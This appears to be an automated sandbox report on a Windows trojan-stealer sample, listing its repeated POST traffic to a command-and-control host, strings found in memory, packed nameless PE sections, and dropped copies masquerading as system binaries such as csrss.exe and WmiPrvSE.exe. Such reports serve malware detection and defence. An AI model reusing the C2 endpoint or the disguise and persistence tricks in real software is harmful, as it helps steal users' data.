                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1860Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1860Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 1848Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficDNS traffic detected: DNS query: 373292cm.nyashka.top
                                    Source: unknownHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 373292cm.nyashka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.0000000003582000.00000004.00000800.00020000.00000000.sdmp, yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.000000000359F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyashka.top
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.00000000034B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyashka.top/
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.0000000003A48000.00000004.00000800.00020000.00000000.sdmp, yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.00000000036C3000.00000004.00000800.00020000.00000000.sdmp, yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.0000000003582000.00000004.00000800.00020000.00000000.sdmp, yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.000000000359F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php
                                    Source: AgentMonitor.exe, 00000006.00000002.1759873239.00000000031DA000.00000004.00000800.00020000.00000000.sdmp, yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2655054570.00000000034B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: Internal.exe, 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/
                                    Source: Internal.exe, 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/openU
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drString found in binary or memory: https://www.ecosia.org/newtab/
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe, 00000010.00000002.2677065174.0000000013347000.00000004.00000800.00020000.00000000.sdmp, tpiVuHvhdL.16.dr, LCUFrCjzFA.16.dr, rrIxBV7bmT.16.dr, 8GjLo9s3Ra.16.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                                    System Summary

                                    barindex
                                    PE file has nameless sections
                                    Source: Internal.exeStatic PE information: section name:
                                    Source: Internal.exeStatic PE information: section name:
                                    Source: Internal.exeStatic PE information: section name:
                                    Source: Internal.exeStatic PE information: section name:
                                    Source: Internal.exeStatic PE information: section name:
                                    Source: Internal.exeStatic PE information: section name:
                                    Source: Internal.exeStatic PE information: section name:
                                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_04AE685B NtQueryInformationProcess,GetSystemInfo,1_2_04AE685B
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCF64B5552E20A487EA7DE13E15F90A989.TMPJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCF64B5552E20A487EA7DE13E15F90A989.TMPJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_004F848E1_2_004F848E
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_004F40FE1_2_004F40FE
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_005040881_2_00504088
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_005000B71_2_005000B7
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_005071531_2_00507153
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_005151C91_2_005151C9
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_005062CA1_2_005062CA
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_004F32F71_2_004F32F7
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_005043BF1_2_005043BF
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0051D4401_2_0051D440
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_004FF4611_2_004FF461
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_004FC4261_2_004FC426
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_005077EF1_2_005077EF
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_004F286B1_2_004F286B
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0051D8EE1_2_0051D8EE
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_005219F41_2_005219F4
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_004FE9B71_2_004FE9B7
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_00506CDC1_2_00506CDC
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_00503E0B1_2_00503E0B
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_004FEFE21_2_004FEFE2
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_00514F9A1_2_00514F9A
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_04AE456D1_2_04AE456D
                                    Source: C:\Blockcomcrt\AgentMonitor.exeCode function: 6_2_00007FFB4AE20D486_2_00007FFB4AE20D48
                                    Source: C:\Blockcomcrt\AgentMonitor.exeCode function: 6_2_00007FFB4AE20E436_2_00007FFB4AE20E43
                                    Source: C:\Blockcomcrt\AgentMonitor.exeCode function: 6_2_00007FFB4B2110906_2_00007FFB4B211090
                                    Source: C:\Blockcomcrt\AgentMonitor.exeCode function: 6_2_00007FFB4B21C8406_2_00007FFB4B21C840
                                    Source: C:\Blockcomcrt\AgentMonitor.exeCode function: 6_2_00007FFB4B219ED86_2_00007FFB4B219ED8
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeCode function: 16_2_00007FFB4AE4112516_2_00007FFB4AE41125
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeCode function: 16_2_00007FFB4AE10D4816_2_00007FFB4AE10D48
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeCode function: 16_2_00007FFB4AE10E4316_2_00007FFB4AE10E43
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeCode function: 16_2_00007FFB4B24503816_2_00007FFB4B245038
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeCode function: 16_2_00007FFB4B209ED816_2_00007FFB4B209ED8
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeCode function: 16_2_00007FFB4B333BA616_2_00007FFB4B333BA6
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeCode function: 16_2_00007FFB4B333AE916_2_00007FFB4B333AE9
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeCode function: 16_2_00007FFB4B333B1416_2_00007FFB4B333B14
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeCode function: 16_2_00007FFB4B338DD316_2_00007FFB4B338DD3
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeCode function: 16_2_00007FFB4B33D64816_2_00007FFB4B33D648
                                    Source: C:\Blockcomcrt\AgentMonitor.exeCode function: 37_2_00007FFB4AE20D4837_2_00007FFB4AE20D48
                                    Source: C:\Blockcomcrt\AgentMonitor.exeCode function: 37_2_00007FFB4AE20E4337_2_00007FFB4AE20E43
                                    Source: C:\Blockcomcrt\AgentMonitor.exeCode function: 37_2_00007FFB4AE5112537_2_00007FFB4AE51125
                                    Source: C:\Blockcomcrt\AgentMonitor.exeCode function: 38_2_00007FFB4AE10D4838_2_00007FFB4AE10D48
                                    Source: C:\Blockcomcrt\AgentMonitor.exeCode function: 38_2_00007FFB4AE10E4338_2_00007FFB4AE10E43
                                    Source: C:\Blockcomcrt\AgentMonitor.exeCode function: 38_2_00007FFB4AE4112538_2_00007FFB4AE41125
                                    Source: C:\Recovery\csrss.exeCode function: 39_2_00007FFB4AE4112539_2_00007FFB4AE41125
                                    Source: C:\Recovery\csrss.exeCode function: 39_2_00007FFB4AE10D4839_2_00007FFB4AE10D48
                                    Source: C:\Recovery\csrss.exeCode function: 39_2_00007FFB4AE10E4339_2_00007FFB4AE10E43
                                    Source: C:\Recovery\csrss.exeCode function: 40_2_00007FFB4AE4112540_2_00007FFB4AE41125
                                    Source: C:\Recovery\csrss.exeCode function: 40_2_00007FFB4AE10D4840_2_00007FFB4AE10D48
                                    Source: C:\Recovery\csrss.exeCode function: 40_2_00007FFB4AE10E4340_2_00007FFB4AE10E43
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeCode function: 45_2_00007FFB4AE10D4845_2_00007FFB4AE10D48
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeCode function: 45_2_00007FFB4AE10E4345_2_00007FFB4AE10E43
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: String function: 0050F5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: String function: 0050EC50 appears 55 times
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: String function: 0050EB78 appears 36 times
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: String function: 0056B264 appears 73 times
                                    Source: Internal.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Internal.exe
                                    Source: Internal.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: AgentMonitor.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: StartMenuExperienceHost.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: csrss.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: WmiPrvSE.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: Internal.exeStatic PE information: Section: ZLIB complexity 0.997276135089686
                                    Source: Internal.exeStatic PE information: Section: ZLIB complexity 0.9946831597222222
                                    Source: Internal.exeStatic PE information: Section: cheat ZLIB complexity 0.9969861534552845
                                    Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@52/68@1/1
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile created: C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exeJump to behavior
